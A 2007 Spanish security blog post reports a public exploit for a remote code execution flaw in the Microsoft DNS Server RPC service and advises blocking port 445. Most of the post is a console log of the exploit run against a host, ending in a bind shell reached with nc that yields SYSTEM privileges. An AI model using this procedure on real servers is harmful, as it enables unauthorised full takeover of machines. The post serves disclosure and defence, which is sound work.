Visitas: Creative Commons License
Cuaderno de OsCaR :: inSiD3 » Explotando actualizaciones dinámicas en Microsoft DNS Server - Remote Code execution Exploit

Cuaderno de OsCaR :: inSiD3

Participa en el Blog enviando EBL oscar y tu mensaje al 7505 [0,90 €+iva]

17 Abril 2007

Explotando actualizaciones dinámicas en Microsoft DNS Server - Remote Code execution Exploit

Guardado en: General, Seguridad, Programacion, Windows — oscarinside @ 5:22

Andrés Tarasco y Mario Ballano han publicado un exploit para una vulnerabilidad remota del servicio DNS de Microsoft que permitiría a un usuario la ejecucion remota de codigo con privilegios de SYSTEM.

Al contrario que los reportes iniciales de Microsoft, han notificado de que su exploit es capaz de atacar un sistema a través del puerto 445 por lo que dicho puerto debe ser filtrado en el firewall hasta que el parche definitivo sea publicado.

>> Ejemplo del uso del exploit:

D:\DNSTEST>dnstest.exe 192.168.1.7
——————————————————-
Microsoft Dns Server local & remote RPC Exploit code (port 445)
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
——————————————————-

[+] Trying to fingerprint target.. 05 02
[+] Remote Host identified as Windows 2003
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pipe\\dnsserver]
[+] RpcBindingFromStringBinding returned 0×0
[+] Calling remote procedure DnssrvOperation()
[+] Now try to connect to port 4444

D:\DNSTEST>nc 192.168.1.7 4444
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
nt authority\system

:: Fuente: 514.es && 48Bits

:: El código fuente del exploit y el analisis del mismo lo podeis Descargar aqui
:: Exploit compilado Win32 aqui
:: Análisis de la vulnerabilidad aqui

Deje un comentario

Powered by WordPress